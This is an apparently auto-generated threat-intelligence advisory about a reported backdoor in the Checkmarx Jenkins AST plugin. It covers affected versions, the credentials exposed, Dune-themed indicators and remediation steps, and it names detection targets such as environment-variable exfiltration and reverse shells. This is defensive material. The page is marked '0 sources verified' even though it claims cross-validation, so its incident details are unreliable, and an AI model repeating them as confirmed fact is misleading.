What is Lyrie Research?

Lyrie Research is an autonomous cybersecurity intelligence platform publishing verified threat intelligence including critical CVEs, active exploitation reports, breach analysis, and original research — every article cross-validated by 3+ primary sources.

How does Lyrie.ai protect against rogue AI threats?

Lyrie.ai uses machine-speed autonomous defense to detect and neutralize rogue AI, prompt injection, and AI supply chain attacks. It responds before human analysts can react.

What cybersecurity topics does Lyrie Research cover?

Lyrie Research covers CVE deep dives, CISA KEV actively exploited vulnerabilities, data breach forensics, original cybersecurity research, and AI threat intelligence including agent-based attacks.

How often is Lyrie Research updated?

Lyrie Research is updated continuously by the autonomous Lyrie Sentinel engine, publishing new threat intelligence multiple times daily as new CVEs, exploits, and breaches are confirmed.

Is Lyrie Research free to access?

Yes, all articles on Lyrie Research are freely accessible. For active protection by the same intelligence engine, visit lyrie.ai.

← Supply-Chain

0 sources verified·4 min read

By Lyrie Threat Intelligence·5/12/2026

CVE-2026-33634: TeamPCP Backdoors Checkmarx Jenkins Plugin — CRITICAL RCE in DevOps Pipelines

TL;DR

Notorious supply-chain group TeamPCP has compromised the Checkmarx Jenkins AST plugin, publishing a backdoored version (2026.5.09) to the official Jenkins Marketplace. Jenkins instances with the malicious plugin are running attacker code with full access to CI/CD secrets, cloud credentials, SSH keys, and source repositories. CVSS 9.4 CRITICAL.

What Happened

On May 10-12, 2026, TeamPCP gained unauthorized access to Checkmarx's Jenkins AST plugin GitHub repository and published a trojanized release. The attacker:

1. Renamed the repository to "Checkmarx-Fully-Hacked-by-TeamPCP-and-Their-Customers-Should-Cancel-Now"

2. Modified the repository description to read: "Checkmarx fails to rotate secrets again. with love – TeamPCP"

3. Published malicious version 2026.5.09 to the official Jenkins Marketplace with embedded backdoor code

4. Defaced artifact repositories with Dune-themed project names (kralizec-navigator-709, mentat-navigator-124) using the signature "A Mini Shai-Hulud has Appeared"

Checkmarx released emergency fixes (version 2.0.13-848.v76e89de8a_053) but notes that the Jenkins Marketplace version remained compromised as of publication. Any Jenkins instance that installed the malicious version now has a persistent backdoor with privileged access to the CI/CD environment.

Technical Details

Affected Versions:

Vulnerable: Jenkins AST plugin version 2026.5.09
Last safe version: 2.0.13-829.vc72453fa_1c16 (released December 17, 2025)
Fixed version: 2.0.13-848.v76e89de8a_053 (available on GitHub and Jenkins Marketplace, but timing and completeness unclear)

Attack Chain:

The plugin runs inside Jenkins with access to:

Build artifacts and source code repositories
All environment variables (GitHub tokens, cloud credentials: AWS/GCP/Azure keys)
Kubernetes configurations and Docker credentials
SSH private keys stored in Jenkins secrets
Outbound network access from the CI/CD pipeline

The presence of Dune-themed repository names suggests this backdoor is connected to the broader "Mini Shai-Hulud" supply-chain worm campaign that has hit TanStack, npm ecosystem packages, Bitwarden CLI, and others since March 2026.

CVE Details:

ID: CVE-2026-33634
CVSS Score: 9.4 (CRITICAL)
Vector: Remote Code Execution, Lateral Movement, Credential Harvesting

Lyrie Assessment

This attack is urgent for every enterprise running Jenkins + Checkmarx AST plugin, and it reveals a critical weakness in the supply chain: even with multi-layered security (vendor integrations, marketplace reviews), attacker access to publishing infrastructure bypasses all validation.

For Lyrie's customers:

1. CI/CD Compromise = Game Over: Unlike a compromised npm package that affects downstream consumers, a backdoored Jenkins plugin grants the attacker immediate, privileged code execution in your deployment pipeline — the keys to your kingdom.

2. Incomplete Rotation Risk: Checkmarx's incident note "in the process of publishing" suggests a delayed response. If your Jenkins ran the malicious version for even hours, all secrets visible to the runner are now exposed. Partial secret rotation is not enough; assume full compromise of any credentials touched during the window of exposure.

3. Persistence Indicator: This is TeamPCP's second strike at Checkmarx in under two months (March 2026: KICS + GitHub Actions + Bitwarden CLI). The group either:

- Retained a dormant foothold from the first breach, or

- Has identified and exploited incomplete remediation practices

Either way, this suggests ongoing access to Checkmarx infrastructure and heightened risk of future attacks.

4. Developer Endpoint Hunting: As Techzine noted, TeamPCP's wider campaign (66+ npm packages, 1000+ SaaS environments compromised) specifically targets developer endpoints for cloud credentials, publishing tokens, and SSH keys. This Jenkins plugin is the crown jewel — it runs in trusted infrastructure where secrets are expected to be available.

5. Autonomous Defense Angle: This incident is a masterclass in why runtime behavior monitoring in CI/CD is non-negotiable. A plugin that suddenly exfiltrates environment variables, makes unexpected outbound connections, or spawns reverse shells should be flagged and isolated immediately. Lyrie's autonomous threat detection in DevOps pipelines would have caught the anomalous behavior of the backdoor in seconds, not weeks.

Recommended Actions

Immediate (Next 24 Hours)

1. Audit Jenkins plugins: Run curl http://your-jenkins:8080/pluginManager/api/json and check if any installed version matches 2026.5.09 or nearby dates. Check Jenkins Marketplace installation logs.

2. Isolate and patch: If found, immediately uninstall the plugin. Update to version 2.0.13-848.v76e89de8a_053 from the official Jenkins website (GitHub source is also safe; Jenkins Marketplace may still serve compromised versions).

3. Full secret rotation: Rotate ALL secrets that were accessible to Jenkins runners during the exposure window:

- GitHub tokens and deploy keys

- AWS/GCP/Azure service accounts

- Kubernetes API tokens

- Docker registry credentials

- SSH private keys

- PyPI, npm publishing tokens

4. Examine build logs: Search Jenkins build logs for:

- Outbound connections to unknown domains

- Dune-themed strings (Shai-Hulud, kralizec, mentat)

- Unusual environment variable access or env command execution

Short-term (1 Week)

5. Forensic investigation: Collect Jenkins logs, plugin telemetry, and network flows from March onward (when TeamPCP's campaign began). Determine the exact window of exposure.

6. Account audits: Check GitHub for unexpected commits, Actions workflow modifications, or repository renames involving your Checkmarx integration.

7. Downstream blast radius: If you used Checkmarx-scanned artifacts in your supply chain, assume they may have been compromised. Rescan with a clean Checkmarx instance and conduct integrity checks on deployed services.

Long-term (Ongoing)

8. CI/CD monitoring: Deploy runtime threat detection in Jenkins that flags:

- Unexpected environment variable access

- Outbound DNS/HTTP from plugins to unknown domains

- Plugin behavior anomalies (CPU spikes, large data transfers)

9. Plugin governance: Implement code review and signature verification for Jenkins plugins. Prefer official Jenkins-maintained plugins over community plugins. Pin versions and regularly audit for updates.

10. Supply-chain baseline: Establish baseline behavior for all CI/CD tools and plugins. Any deviation triggers immediate isolation and investigation.